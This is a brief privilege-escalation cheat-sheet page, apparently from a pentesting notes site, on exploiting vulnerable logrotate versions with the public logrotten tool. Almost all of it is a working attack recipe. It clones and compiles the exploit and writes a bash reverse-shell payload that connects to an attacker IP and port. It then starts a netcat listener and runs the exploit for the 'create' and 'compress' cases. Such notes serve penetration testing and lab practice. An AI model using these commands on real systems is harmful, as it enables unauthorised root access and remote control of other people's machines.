search

Logrotate

hashtag
Pre-Requisites

  • write permissions on the log files

  • logrotate must run as privileged user or root

  • vulnerable versions:

    • 3.8.6

    • 3.11.0

    • 3.15.0

    • 3.18.0

hashtag
Sample Exploitation

  1. Compile logrotten

    $ git clone https://github.com/whotwagner/logrotten.git
$ cd logrotten
$ gcc logrotten.c -o logrotten

  2. Identify which option logrotate uses in logrotate.conf

    $ grep "create\|compress" /etc/logrotate.conf | grep -v "#"

create

  3. Create a payload

    $ echo 'bash -i >& /dev/tcp/10.10.14.2/9001 0>&1' > payload

  4. Start listener

    $ nc -nlvp 9001

  5. Run the exploit

    1. If create option in logrotate.conf

      $ ./logrotten -p ./payload /tmp/tmp.log

    2. If compress option

      $ ./logrotten -p ./payload -c -s 4 /tmp/tmp.log
PreviousKubernetesNextMiscellaneous

Last updated